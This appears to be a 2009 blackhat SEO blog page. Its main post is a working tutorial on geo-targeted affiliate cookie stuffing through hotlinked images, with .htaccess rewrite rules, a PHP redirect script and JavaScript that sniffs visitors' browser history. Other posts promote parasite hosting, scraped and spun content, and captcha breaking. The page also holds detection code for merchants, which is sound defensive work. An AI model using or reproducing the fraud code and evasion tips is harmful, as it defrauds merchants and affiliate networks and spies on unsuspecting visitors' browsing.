
Geo-Targeted Image Based Cookie Stuffing

July 16, 2009

People are lazy, so I write this first
This research-based post will demonstrate the techniques behind stuffing affiliate cookies via images on any website where you can post images (think forums), how to get other people to do this for you, and how to geographically target cookie stuffing.

Zonk. Back in 2007 I did a post about making money with affiliates by cookie stuffing. While nobody admits to cookie stuffing, it turns out you’re all lying shits as that post gets more search traffic than anything else.

Personally, I think cookie stuffing is low, I wouldn’t recommend it or condone it. It’s probably illegal (ebay certainly think so) and you’ll probably go to hell in the afterlife.

Oh, you’ll probably get caught too if you used lame iframe techniques, so for research purposes only I want to explain how to turn cookie stuffing up a notch, if you were silly enough to do such a thing.

iFrames are so 1990s
I’d be quite happy never to see an iframe again, even though I’m sure there’s going to be a rebirth, since SEOmoz said it was a possible route to sculpt PageRank after Mr. Cutts admitted that nofollow actually doesn’t sculpt anything.

Yea, so don’t use them.

Serving cookies through images
You can actually serve cookies through images (sort of). It’s a lot more sneaky and it means you can essentially serve a cookie to anywhere you can post HTML.

I’ve seen people propagate this by encouraging people to hotlink as well. So for instance, auto-generating a celebrity photo gallery and offering embed codes. Visitors merrily go about posting images all over the web while they are secretly serving cookies.

So there’s a mechanism to automatically propagate cookies all over the interwebs.

Geo-targeting cookie stuffing
Conversion rate is one of a few indicators that affiliate networks watch to try and rumble cookie stuffers. You need to do everything you can to make sure your conversion rate is as high as possible. So, let’s start with geo-targeting. It’s no good serving cookies to Americans for eBay UK, or serving ebay.com cookies to Italians. You get the idea. So detecting what country your visitor is from and serving the correct cookie raises the number of conversions you get per stuffed cookie.

Cookie stuffing images with .htaccess
Okay, we’re going to have to intercept image requests and redirect them to a script to decide if and which cookie to stuff.

The .htaccess file below grabs image requests that do not originate from your site or from search bots and passes them to a serveimage.php script.

Options +FollowSymLinks
RewriteEngine on

# Let's not cookie stuff our own visitors! First, requests with no Referer at all (direct hits) pass through untouched
RewriteCond %{HTTP_REFERER} !^$ [NC]

# If the request is outside of your site
RewriteCond %{HTTP_REFERER} !^http://([^.]+\.)?mywebsite\.com/ [NC]

# If the request is not from a few bots (pretty basic, add to this!)
RewriteCond %{HTTP_USER_AGENT} !(googlebot-image|msnbot|psbot|yahoo-mmcrawler) [NC]

# Grab the image name and extension type, go to our serveimage.php file
# (the dot before the extension is escaped so it matches a literal "." only)
RewriteRule ^images/([a-zA-Z0-9]+)\.(bmp|gif|jpe?g|png)$ /serveimage.php?img=$1&ext=$2 [L]

Cookie stuffing images with PHP
Now that image requests are being passed to serveimage.php, you need to have the following in place:

<?php
// Get the image name and extension from the rewritten request, accepting only
// what the .htaccess rule itself would pass through, so serveimage.php cannot
// be asked for anything other than images/<name>.<ext>
$img = isset($_GET['img']) ? $_GET['img'] : '';
$ext = isset($_GET['ext']) ? strtolower($_GET['ext']) : '';
if (!preg_match('/^[a-zA-Z0-9]+$/', $img) || !preg_match('/^(bmp|gif|jpe?g|png)$/', $ext)) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
$path = dirname(__FILE__) . '/images/' . $img . '.' . $ext;

// Decide if we should stuff our lucky visitor with a cookie

// Let's generate a random number
$rand = mt_rand(0, 1000);

// See if it is a lucky request
// You can change the percentage by changing $rand<??; 5=0.5%, 10=1%, 100=10% etc
// 10% chance to serve cookie instead of image
if ($rand < 100) {
    cookie_stuff();
} else {
    spit_it_out($ext, $path);
}

// Functions

// Forget it - serve them an image!
function spit_it_out($ext, $path) {
    if (!is_file($path)) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
    header("Cache-Control: no-cache");
    header("Pragma: no-cache");
    if ($ext == 'jpeg' || $ext == 'jpg') {   // logical ||, not the bitwise |
        header("Content-type: image/jpeg");
    } else if ($ext == 'gif') {
        header("Content-type: image/gif");
    } else if ($ext == 'bmp') {
        header("Content-type: image/bmp");
    } else {
        header("Content-type: image/png");
    }
    // Read the file from disk rather than re-requesting it over HTTP from ourselves
    readfile($path);
    exit;
}

// We have a winner! Stuff a cookie
function cookie_stuff() {
    $ip = $_SERVER['REMOTE_ADDR'];

    // Work out what country they are in (fall back to US if the lookup fails)
    $country = @file_get_contents("http://api.hostip.info/country.php?ip=" . urlencode($ip));
    if ($country === false) {
        $country = "US";
    }
    $country = trim($country);

    // Add as many countries as you want: http://www.worldatlas.com/aatlas/ctycodes.htm
    if ($country == "UK") {
        header('Location: http://YOUR-UKAFFILIATE-LINK'); //UK
    } elseif ($country == "CA") {
        header('Location: http://YOUR-CANADA-AFFILIATE-LINK'); //CANADA
    } else {
        header('Location: http://YOUR-USA-AFFILIATE-LINK'); //US
    }
    exit; // stop here so no image bytes follow the redirect
}
?>

So this PHP code takes the hotlinked request and, 10% of the time, stuffs an affiliate cookie for the correct country; the other 90% of the time it serves the image correctly.

You can add as many country codes as you like; you can get a list from WorldAtlas.

I’ve personally seen people make over 1,000 per day when they get creative with cookies. Obviously, the deeper you stick your hand in the cookie jar, the more likely you are to get caught.
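A check from the other side of the fence, added here and not part of the original post: how a forum or image host could test a hotlinked image URL for the behaviour of the rewrite and script above. It sends a browser-like request with an off-site Referer (with no Referer the RewriteCond rules never match and the real image is served) and samples the URL repeatedly, since the redirect fires only about 10% of the time; the header values, the forum.example.net referer and the fetch helper are assumptions of this example.

```python
import urllib.error
import urllib.request
from urllib.parse import urlsplit

# A browser-like request: the rewrite above only fires for non-empty, off-site
# Referers and non-bot User-Agents, so a naive scanner never sees the redirect.
# Both header values are constructed for this example.
BROWSER_HEADERS = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/115.0",
    "Referer": "https://forum.example.net/thread/1234",
}

def fetch_no_follow(url, headers):
    """Live fetch (hypothetical helper): (status, lowercased headers), redirects not followed."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None  # surface the 3xx instead of following it
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(urllib.request.Request(url, headers=headers), timeout=10) as r:
            return r.status, {k.lower(): v for k, v in r.headers.items()}
    except urllib.error.HTTPError as e:
        return e.code, {k.lower(): v for k, v in e.headers.items()}

def classify_response(url, status, headers):
    """Label one response to an <img> URL: ok, redirect-offsite or non-image."""
    if 300 <= status < 400:
        target = urlsplit(headers.get("location", "")).hostname
        if target and target != urlsplit(url).hostname:
            return "redirect-offsite"
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if status == 200 and not ctype.startswith("image/"):
        return "non-image"
    return "ok"

def scan_image_url(url, fetch=fetch_no_follow, samples=40):
    """Sample the URL repeatedly: the script above redirects only ~10% of hits,
    so one clean fetch proves nothing. Returns the set of non-ok labels seen."""
    seen = set()
    for _ in range(samples):
        status, headers = fetch(url, BROWSER_HEADERS)
        label = classify_response(url, status, headers)
        if label != "ok":
            seen.add(label)
    return seen
```

Any off-site Location or non-image body on an `<img>` URL is a reason to strip the embed and review the account that posted it.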

Other security measures and improvements
As the more astute among you have no doubt realised, big boy sites have more layers for detecting cookie stuffing, such as:

1) What page do people land on (always the same page being hit?)

2) How long do they stay on the site on average

3) How many / which pages do they view

4) Some sites double serve a verification file, such as a tiny gif and cross-check you have the image and the cookie

Some of the basic stuff like user agent / IP is covered in this script, but at any scale you’d need to tackle the issues above. Yes, it’s totally possible – just remember, if a human can do it in a browser, you can write a script to do it as well.
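As an added example (not from the post), here is how a merchant or network might score the signals in that list over affiliate-tagged visits: landing-page diversity, pages viewed, dwell time, whether the verification pixel loaded, and conversion rate. The visit records are constructed and the thresholds are illustrative assumptions.

```python
from collections import defaultdict
from statistics import median

# Constructed sample data (not real traffic): one record per visit that arrived with an affiliate cookie.
VISITS = [
    # "honest": varied landing pages, real browsing, pixel loaded, one sale
    {"aff": "honest", "land": "/item/%d" % i, "pages": 2 + i % 5,
     "dwell": 60 + 30 * i, "pixel": True, "conv": i == 3}
    for i in range(8)
] + [
    # "stuffer": every "visit" is a bare redirect hit that never renders a page
    {"aff": "stuffer", "land": "/", "pages": 1, "dwell": 0, "pixel": False, "conv": False}
    for _ in range(8)
]

def affiliate_profiles(visits):
    """Aggregate the post's detection signals per affiliate."""
    groups = defaultdict(list)
    for v in visits:
        groups[v["aff"]].append(v)
    profiles = {}
    for aff, vs in groups.items():
        n = len(vs)
        profiles[aff] = {
            "clicks": n,
            "conv_rate": sum(v["conv"] for v in vs) / n,
            "bounce_rate": sum(v["pages"] <= 1 for v in vs) / n,
            "median_dwell": median(v["dwell"] for v in vs),
            "pixel_miss_rate": sum(not v["pixel"] for v in vs) / n,
            # distinct landing pages per click: a stuffer lands everyone on one URL
            "landing_diversity": len({v["land"] for v in vs}) / n,
        }
    return profiles

def flag_stuffers(profiles, min_clicks=5):
    """{affiliate: [reasons]} for affiliates tripping two or more signals (thresholds are assumed)."""
    flagged = {}
    for aff, p in profiles.items():
        if p["clicks"] < min_clicks:
            continue  # too few clicks to judge
        checks = [
            (p["pixel_miss_rate"] > 0.5, "verification pixel rarely loaded"),
            (p["bounce_rate"] > 0.9 and p["median_dwell"] < 5, "no browsing after the tagged hit"),
            (p["landing_diversity"] < 0.25, "single landing page"),
            (p["conv_rate"] == 0, "zero conversions"),
        ]
        reasons = [text for hit, text in checks if hit]
        if len(reasons) >= 2:
            flagged[aff] = reasons
    return flagged
```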

Get creative – check the browser history

If you want to raise conversion rates even further, you can check that they’ve visited the site you want to cookie stuff for. If they’ve previously visited the site, it’s much more likely they’ve got an account and are likely to buy.

Here’s some JavaScript to check user history (I didn’t write this one):

var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [
  "http://list.com/",
  "http://of.com/",
  "http://sites.com/",
  "http://you.com/",
  "http://want.com/",
  "http://to.com/",
  "http://check.com/",
  "http://users.com/",
  "http://history.com/",
  "http://for.com/",
];

/* prevent multiple XSS loads */
if (!document.getElementById('xss_flag')) {

  var flag = document.createElement('div');
  flag.id = 'xss_flag';
  document.body.appendChild(flag);

  // table that receives the list of visited sites
  var results = document.createElement('table');
  results.border = 0;
  results.cellPadding = 5;
  results.cellSpacing = 10;
  results.width = '90%';
  results.align = 'center';
  results.id = 'data';
  document.body.appendChild(results);

  /* launch steal history */
  if (is_mozilla) {
    stealHistory();
  }
}

function stealHistory() {
  var results = document.getElementById('data');

  // loop through websites and check which ones have been visited
  for (var i = 0; i < websites.length; i++) {
    var link = document.createElement("a");
    link.id = "id" + i;
    link.href = websites[i];
    link.innerHTML = websites[i];
    document.body.appendChild(link);
    // Relies on getComputedStyle exposing the :visited colour; Firefox 4 and later
    // browsers report the unvisited colour here, which closed this technique.
    var color = document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
    document.body.removeChild(link);
    // check for visited (assumes the page's a:visited rule sets the colour to #0000FF)
    if (color == "rgb(0, 0, 255)") {
      var row = results.insertRow(-1);
      row.insertCell(0).appendChild(document.createTextNode(websites[i]));
    } // end visited check
  } // end visited website loop
} // end stealHistory method

I hope this post helps merchants and affiliate networks everywhere to tackle cookie stuffers. I’ll do a follow-up at some point explaining how to mimic user browsing behaviour properly.

End thought: web-based e-mail clients can also load images. Chain mails still do well...

Like this article? Then subscribe to the feed!

Posted by Mark at 10:32pm
17 Comments

Get A Free Link In 30 Seconds

June 09, 2009

Quick heads up, if you want a free link from http://www.further.co.uk/blog all you have to do is Tweet an SEO Tip to the #fseo hashtag on Twitter.

Full details here: http://www.further.co.uk/blog/Tweet-SEO-Tips-Get-A-Link-From-Us-144

Doesn’t get much easier than that.

I’m doing a lot of blogging over there at the moment (one reason why there’s fewer updates here). So if you want more solid advice (with less blackhat), I’d recommend:

How Much Is An SEO Site Audit Worth?

SEO Keyword Selection And Calculating Value

SEO For Misspellings

The Google Sitelinks Guide

Banned In Google – The Complete Guide

Posted by Mark at 2:38pm
9 Comments

Using Twitter To Power Spam

March 03, 2009

Good afternoon and a happy square root day to you. (C’mon it’s no more made up than Valentine’s Day).

Despite my initial reservations, I’m actually finding Twitter moderately useful for content and link discovery; the trick is really just following the right people and ditching time wasters. I’m not going to bore you with a lecture on how Twitter is the next big thing; in fact I’m pretty sure we’re fast approaching the point at which Gartner’s Hype Cycle predicts a crash of interest and disillusionment.

[Image: Twitter in Gartner’s Hype Cycle]

Well, maybe, maybe not – argue it amongst yourselves, it’s not what I really want to talk about. I want to talk about…

Twitter and Spam
Although I’ve only really talked about parasite hosting indirectly, when looking at ranking factors to do with age and trust, I think it’s a point briefly worth mentioning.

I saw Quadzilla posted today about parasite hosting on Twitter. Hopefully that hasn’t eluded you: aside from other methods of finding places to parasite host, all you need to look for are trusted domains that allow you to post content with little moderation. Even a basic search for Viagra shows that the #2 position is essentially a parasite-hosted page on the hotfroguk directory (thanks Ryan for your dedication in trawling Viagra results).

As Quadzilla rightly points out, with Twitter being almost totally unmoderated, the sad fact is it’s going to get bombed to hell over the next 12 months by blackhat SEOs and then Google will do something about it and game over.

There are however (slightly) more legitimate uses for Twitter if you’ve got your heart set on some easy rankings.

Twitter and content generation
Content generation can be a tricky game: you can plain scrape it (not really generation :P), scrape it and spin it, use synonym replacement or Markov chaining, or, if you’re really smart, come up with your own way to do it.

There are several problems inherent in content generation, whether it’s duplicate content, poor quality, or your algorithm getting skewed by internet randomness. I’ve seen a lot of people trying to generate websites based on data they can pull from keyword trends or “hot” trends. The problem is that most of the services give you the information you need after the fact. The news has come, the search spike has been, and your content generation system has given you a crummy bit of content which now has to compete with established sites with real content. Oh, and the fact nobody cares anymore.

Twitter, on the other hand, is instant. It’s not uncommon for me to discover new “hot” things on Twitter hours before mainstream news (i.e. authoritative sites) publish it (and days before Seth Godin makes an informed-in-hindsight comment).

Without spoon feeding, I put this to you: Why not let tweeting twits find your content for you? There’s many ways you can do this:

1) There are lovely people that get this information for you. For instance: http://twitturly.com/ will give you the most tweeted links. There’s all your early breaking generic news for you, just set your cURL bot to follow those tinyurls and discover the source and scrape away.

2) If you’re in a niche, find everyone who tweets in that niche, use cURL to crawl the links they tweet, log them to a database, use a little intelligent keyword selection to make sure they’re relevant, then repost.

Then of course, ping the world with your new content, break some captchas and submit to a list of social sites and drop a few links here and there. Aside from services such as Google Blog Search, which work on an almost exclusively chronological basis, you stand a good chance of getting a healthy amount of visitors since you’re one of the first few to get content up.

Added note for clarity: I’m talking about scraping titles/content from URLs you have followed from tweets – not tweets themselves. The majority of the links to new breaking / interesting stories will come inside a very small window. So if you can post this content up while there is still interest / searches and before someone has link dominance, you should even be able to give the duplicate content penalty the slip, even if you’ve 100% scraped – so you’re on a winner – you could even retweet it (:

Oh, don’t forget to jam it full of ads or something. Who cares? It’s all automated. Think of it at least as a weekend project, but don’t break Twitter, it’s growing on me (:

Posted by Mark at 9:55pm
5 Comments

Valentines Day Help

February 13, 2009

If you’re a hopeless romantic, but hopelessly busy like me, I hope this helps you with your last minute valentine’s day preparations.


Download “valentine.pdf”

Fingers crossed.

Posted by Mark at 6:32pm
3 Comments

Twitter Requests

February 12, 2009

I’ve been on twitter for probably about a year, but only really started using it recently. I’ve had quite a few emails asking what my twitter account is. So, to save some time you can find me here.

Posted by Mark at 3:00am
3 Comments